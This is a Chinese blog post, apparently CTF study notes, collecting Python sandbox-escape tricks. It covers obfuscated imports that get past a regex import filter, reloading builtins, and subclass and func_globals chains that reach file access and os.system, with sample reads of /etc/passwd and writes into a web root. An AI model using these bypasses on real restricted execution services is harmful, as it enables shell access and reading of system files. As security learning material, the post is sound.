<!DOCTYPE html>













<html class="theme-next muse" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: true,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>


  




  <meta name="description" content="沙盒逃逸简介沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程 对于python的沙箱逃逸而言,我们来实现目的的最终想法有以下几个  使用os包中的popen,system两个函数来直接执行shell 使用commands模块中的方法 使用subprocess 使用写文件到指定位置,再使用其他辅助手段  1234">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="Python沙盒逃逸">
<meta property="og:url" content="https://zo1ro.github.io/2018/09/14/py-sandbox/index.html">
<meta property="og:site_name" content="ZO1RO">
<meta property="og:description" content="沙盒逃逸简介沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程 对于python的沙箱逃逸而言,我们来实现目的的最终想法有以下几个  使用os包中的popen,system两个函数来直接执行shell 使用commands模块中的方法 使用subprocess 使用写文件到指定位置,再使用其他辅助手段  1234">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/14/py-sandbox/1.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/14/py-sandbox/2.png">
<meta property="og:updated_time" content="2019-05-09T16:35:30.263Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Python沙盒逃逸">
<meta name="twitter:description" content="沙盒逃逸简介沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程 对于python的沙箱逃逸而言,我们来实现目的的最终想法有以下几个  使用os包中的popen,system两个函数来直接执行shell 使用commands模块中的方法 使用subprocess 使用写文件到指定位置,再使用其他辅助手段  1234">
<meta name="twitter:image" content="https://zo1ro.github.io/2018/09/14/py-sandbox/1.png">



  <link rel="alternate" href="/atom.xml" title="ZO1RO" type="application/atom+xml">



  
  
  <link rel="canonical" href="https://zo1ro.github.io/2018/09/14/py-sandbox/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Python沙盒逃逸 | ZO1RO</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ZO1RO</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">一个向往acm的ctf_dog</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://zo1ro.github.io/2018/09/14/py-sandbox/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ZO1RO">
      <meta itemprop="description" content="永远做好最坏的打算">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZO1RO">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Python沙盒逃逸

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-09-14 21:40:24" itemprop="dateCreated datePublished" datetime="2018-09-14T21:40:24+08:00">2018-09-14</time>
            

            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="沙盒逃逸简介"><a href="#沙盒逃逸简介" class="headerlink" title="沙盒逃逸简介"></a>沙盒逃逸简介</h2><p>沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程</p>
<p>对于python的沙箱逃逸而言,我们来实现目的的最终想法有以下几个</p>
<ul>
<li>使用os包中的popen,system两个函数来直接执行shell</li>
<li>使用commands模块中的方法</li>
<li>使用subprocess</li>
<li>使用写文件到指定位置,再使用其他辅助手段</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> commands</span><br><span class="line"></span><br><span class="line"><span class="comment"># 直接输入shell命令,以ifconfig举例</span></span><br><span class="line">os.system(<span class="string">'ifconfig'</span>)</span><br><span class="line">os.popen(<span class="string">'ifconfig'</span>)</span><br><span class="line">commands.getoutput(<span class="string">'ifconfig'</span>)</span><br><span class="line">commands.getstatusoutput(<span class="string">'ifconfig'</span>)</span><br><span class="line">subprocess.call([<span class="string">'ifconfig'</span>],shell=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>
 <a id="more"></a>
<p>但一般题目中会有各种过滤，禁止用户引用敏感的包</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line">code = open(<span class="string">'code.py'</span>).read()</span><br><span class="line">pattern  = re.compile(<span class="string">'import\s+(os|commands|subprocess|sys)'</span>)</span><br><span class="line">match = re.search(pattern,code)</span><br><span class="line"><span class="keyword">if</span> match:</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"forbidden module import detected"</span></span><br><span class="line">    <span class="keyword">raise</span> Exception</span><br></pre></td></tr></table></figure>
<p>python中导入模块有以下几种方式</p>
<ol>
<li><code>import xxx</code></li>
<li><code>from xxx import *</code></li>
<li><code>__import__(&#39;xxx&#39;)</code></li>
</ol>
<p>而我们绕过敏感包就必须使用其他引用方式</p>
<ol>
<li><code>import 关键字</code></li>
<li><code>__import__函数</code></li>
<li><code>importlib库</code></li>
</ol>
<p>import 是一个关键字,因此,包的名字是直接以 ‘tag’(标记)的方式引入的,但是对于函数和包来说,引入的包的名字就是他们的参数,也就是说,将会以字符串的方式引入<br>我们可以对原始关键字做出种种处理来bypass掉源码扫描</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">//__import__函数bypass</span><br><span class="line"><span class="keyword">print</span> __import__(<span class="string">"pbzznaqf"</span>.decode(<span class="string">'rot_13'</span>)).getoutput(<span class="string">'ipconfig'</span>)</span><br><span class="line"></span><br><span class="line">//importlib库bypass</span><br><span class="line"><span class="keyword">import</span> importlib</span><br><span class="line"><span class="keyword">print</span> importlib.import_module(<span class="string">"pbzznaqf"</span>.decode(<span class="string">'rot_13'</span>).getoutput(<span class="string">'ifconfig'</span>)</span><br></pre></td></tr></table></figure>
<h2 id="沙盒逃逸各种方法"><a href="#沙盒逃逸各种方法" class="headerlink" title="沙盒逃逸各种方法"></a>沙盒逃逸各种方法</h2><p>在python中，不用引入直接使用的内置函数称为 builtin 函数（内联函数），随着<strong>builtin</strong>这一个 module 自动被引入到环境中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//函数调用执行</span><br><span class="line">__builtin__.open()</span><br><span class="line">__builtin__.int()</span><br><span class="line">__builtin__.chr()</span><br></pre></td></tr></table></figure>
<p>(在python3.x 版本中,<code>__builtin__</code>变成了<code>builtins</code>,而且需要引入)</p>
<p><img src="1.png" alt></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">//如果一些内联函数在builtins删除 ，我们可以通过reload(__builtins__)重新载入获取一个完整的builtins</span><br><span class="line">//但是,reload也是__builtin__下面的函数,如果直接把它干掉,就没办法重新引入了</span><br><span class="line">//这个时候可以在python中引入一个名为imp的模块</span><br><span class="line"><span class="keyword">import</span> imp</span><br><span class="line">imp.reload(__builtin__)</span><br><span class="line">//然后我们就会重新得到完整的__builtin__模块了</span><br></pre></td></tr></table></figure>
<p>python的object类中集成了很多的基础函数，下面举常见两种方法进入类调用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">().__class__.__bases__[<span class="number">0</span>]</span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>().__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">&lt;type <span class="string">'object'</span>&gt;</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">''</span>.__class__.__mro__[<span class="number">2</span>]</span><br><span class="line">&lt;type <span class="string">'object'</span>&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>dir(().__class__.__bases__[<span class="number">0</span>])</span><br><span class="line">[<span class="string">'__class__'</span>, <span class="string">'__delattr__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__format__'</span>, <span class="string">'__getattribute__'</span>, <span class="string">'__hash__'</span>, <span class="string">'__init__'</span>, <span class="string">'__new__'</span>, <span class="string">'__reduce__'</span>, <span class="string">'__reduce_ex__'</span>, <span class="string">'__repr__'</span>, <span class="string">'__setattr__'</span>, <span class="string">'__sizeof__'</span>, <span class="string">'__str__'</span>, <span class="string">'__subclasshook__'</span>]</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>dir(<span class="string">''</span>.__class__.__mro__[<span class="number">2</span>])</span><br><span class="line">[<span class="string">'__class__'</span>, <span class="string">'__delattr__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__format__'</span>, <span class="string">'__getattribute__'</span>, <span class="string">'__hash__'</span>, <span class="string">'__init__'</span>, <span class="string">'__new__'</span>, <span class="string">'__reduce__'</span>, <span class="string">'__reduce_ex__'</span>, <span class="string">'__repr__'</span>, <span class="string">'__setattr__'</span>, <span class="string">'__sizeof__'</span>, <span class="string">'__str__'</span>, <span class="string">'__subclasshook__'</span>]</span><br><span class="line"></span><br><span class="line">//存在hook函数可直接调用</span><br></pre></td></tr></table></figure>
<p><img src="2.png" alt></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">//其中存在file类</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>]</span><br><span class="line">&lt;type <span class="string">'file'</span>&gt;</span><br><span class="line"></span><br><span class="line">//可直接进行文件操作</span><br><span class="line">//读文件</span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">r'E:\zo1ro.md'</span>).read()</span><br><span class="line"></span><br><span class="line">//写文件</span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'/var/www/html/zo1ro.html'</span>, <span class="string">'w'</span>).write(<span class="string">'helloworld'</span>)</span><br><span class="line"></span><br><span class="line">//执行任意命令</span><br><span class="line">().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.func_globals.values()[<span class="number">13</span>][<span class="string">'eval'</span>](<span class="string">'__import__("os").popen("ifconfig").read()'</span> )</span><br></pre></td></tr></table></figure>
<p>在os模块被屏蔽后，可通过其他子类进行调用os模块进行命令执行和文件读写</p>
<p>这里举例通过warnings.catch_warnings类调用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">import</span> warnings</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__().index(warnings.catch_warnings)</span><br><span class="line"><span class="number">60</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__()[<span class="number">59</span>]</span><br><span class="line">&lt;<span class="class"><span class="keyword">class</span> '<span class="title">warnings</span>.<span class="title">WarningMessage</span>'&gt;</span></span><br><span class="line"><span class="class">&gt;&gt;&gt; [].<span class="title">__class__</span>.<span class="title">__base__</span>.<span class="title">__subclasses__</span><span class="params">()</span>[59].<span class="title">__init__</span>.<span class="title">func_globals</span>.<span class="title">keys</span><span class="params">()</span></span></span><br><span class="line">['filterwarnings', 'once_registry', 'WarningMessage', '_show_warning', 'filters', '_setoption', 'showwarning', '__all__', 'onceregistry', '__package__', 'simplefilter', 'default_action', '_getcategory', '__builtins__', 'catch_warnings', '__file__', 'warnpy3k', 'sys', '__name__', 'warn_explicit', 'types', 'warn', '_processoptions', 'defaultaction', '__doc__', 'linecache', '_OptionError', 'resetwarnings', 'formatwarning', '_getaction']</span><br><span class="line"></span><br><span class="line">//这里找到linecache，linecache 模块的作用是将文件内容读取到内存中</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__()[<span class="number">59</span>].__init__.func_globals.keys().index(<span class="string">'linecache'</span>)</span><br><span class="line"><span class="number">25</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__()[<span class="number">59</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.keys()</span><br><span class="line">[<span class="string">'updatecache'</span>, <span class="string">'clearcache'</span>, <span class="string">'__all__'</span>, <span class="string">'__builtins__'</span>, <span class="string">'__file__'</span>, <span class="string">'cache'</span>, <span class="string">'checkcache'</span>, <span class="string">'getline'</span>, <span class="string">'__package__'</span>, <span class="string">'sys'</span>, <span class="string">'getlines'</span>, <span class="string">'__name__'</span>, <span class="string">'os'</span>, <span class="string">'__doc__'</span>]</span><br><span class="line"></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__()[<span class="number">59</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>]</span><br><span class="line">&lt;module <span class="string">'os'</span> <span class="keyword">from</span> <span class="string">'C:\Python27\lib\os.pyc'</span>&gt;</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__()[<span class="number">59</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>].__dict__.keys().index(<span class="string">'system'</span>)</span><br><span class="line"><span class="number">79</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__()[<span class="number">59</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>].__dict__.keys()[<span class="number">79</span>]</span><br><span class="line"><span class="string">'system'</span></span><br><span class="line"></span><br><span class="line">//调用system函数进行命令执行</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>a=[].__class__.__base__.__subclasses__()[<span class="number">59</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>].__dict__.values()[<span class="number">79</span>]</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>a</span><br><span class="line">&lt;built-<span class="keyword">in</span> function system&gt;</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>a(<span class="string">'ipconfig'</span>)</span><br></pre></td></tr></table></figure>
<h3 id="其他的一些执行函数"><a href="#其他的一些执行函数" class="headerlink" title="其他的一些执行函数"></a><strong>其他的一些执行函数</strong></h3><ul>
<li><strong>timeit</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">import</span> timeit</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>timeit.timeit(<span class="string">"__import__('os').system('ipconfig')"</span>,number=<span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>exec&amp;eval</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>eval(<span class="string">'__import__("os").system("ipconfig")'</span>)</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>exec(<span class="string">'__import__("os").system("ipconfig")'</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>platform</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">import</span> platform</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">print</span> platform.popen(<span class="string">'ipconfig'</span>).read()</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>变量替换</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a = open</span><br><span class="line">print(a(<span class="string">"/etc/passwd"</span>).read())</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>函数名后面加点空格换一行</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">print</span> open</span><br><span class="line">(<span class="string">"/etc/passwd"</span>).read()</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>使用第三方库的执行命令的函数</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">//如果程序中调用了第三方的库，恰好这个库有执行命令的函数，那么肯定是再好不过了</span><br><span class="line"><span class="keyword">from</span> numpy.distutils.exec_command <span class="keyword">import</span> _exec_command <span class="keyword">as</span> system</span><br><span class="line">system(<span class="string">"ls /"</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>使用别名</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os <span class="keyword">as</span> o</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>字符串拼接</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"l"</span>+<span class="string">"s"</span></span><br><span class="line"><span class="string">"func_global"</span>+<span class="string">"s"</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__base__.__subclasses__()[<span class="number">72</span>].__init__.__getattribute__(<span class="string">'func_global'</span>+<span class="string">'s'</span>)[<span class="string">'os'</span>].system(<span class="string">'ipconfig'</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>字符串编码或者其他操作</strong></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">//如果过滤的是键值对中的key(为了强调是字符串类型)</span><br><span class="line">//方法一：使用编码的转换</span><br><span class="line">&gt;&gt;&gt;<span class="string">'X19pbXBvcnRfXw=='</span>.decode(<span class="string">'base64'</span>)</span><br><span class="line">//方法二：使用python的字符串操作</span><br><span class="line">&gt;&gt;&gt;s = <span class="string">"emit"</span></span><br><span class="line">&gt;&gt;&gt;s = s [::<span class="number">-1</span>]</span><br><span class="line">&gt;&gt;&gt;<span class="keyword">print</span> a[s]</span><br></pre></td></tr></table></figure>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/" target="_blank" rel="noopener">关于Python sec的一些简单的总结</a></p>
<p><a href="http://blog.0kami.cn/2016/09/16/old-python-sandbox-escape/" target="_blank" rel="noopener">【VULNERABLITY】python sandbox escape</a></p>
<p><a href="https://blog.csdn.net/qq_35078631/article/details/78504415" target="_blank" rel="noopener">python沙箱逃逸小结</a></p>
<p><a href="https://blog.csdn.net/wy_97/article/details/80393854" target="_blank" rel="noopener">python沙箱逃逸一些套路的小结</a></p>
<p><a href="https://www.anquanke.com/post/id/85571" target="_blank" rel="noopener">从一个CTF题目学习Python沙箱逃逸</a></p>
<p><a href="https://xz.aliyun.com/t/52" target="_blank" rel="noopener">Python沙箱逃逸的n种姿势</a></p>
<p><a href="http://blog.merl1ng.cc/2018/08/16/python%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8/" target="_blank" rel="noopener">python沙盒逃逸</a></p>
<p><a href="http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/" target="_blank" rel="noopener">Python 沙盒逃逸备忘</a></p>
<p><a href="https://bestwing.me/awesome-python-sandbox-in-ciscn.html" target="_blank" rel="noopener">Python 沙盒绕过</a></p>
<p><a href="http://wulidecade.cn/2018/09/21/python%E6%B2%99%E7%9B%92%E6%80%BB%E7%BB%93/" target="_blank" rel="noopener">python沙盒总结</a></p>
<p><a href="https://wintersun.space/2016/06/08/python%E5%91%BD%E4%BB%A4%E8%A1%8C%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4/" target="_blank" rel="noopener">python沙盒绕过</a></p>
<p>记录一下，后补……</p>

      
    </div>

    

    
    
    

    
      <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束 <i class="fa fa-heart"></i> 感谢阅读-------------</div>

    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag">📖ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/27/legal/" rel="next" title="【转】[中华人民共和国网络安全法]">
                <i class="fa fa-chevron-left"></i> 【转】[中华人民共和国网络安全法]
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/09/20/flask-pin/" rel="prev" title="FLASK PIN DEBUG">
                FLASK PIN DEBUG <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ZO1RO</p>
              <div class="site-description motion-element" itemprop="description">永远做好最坏的打算</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/ZO1RO" title="GitHub &rarr; https://github.com/ZO1RO" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
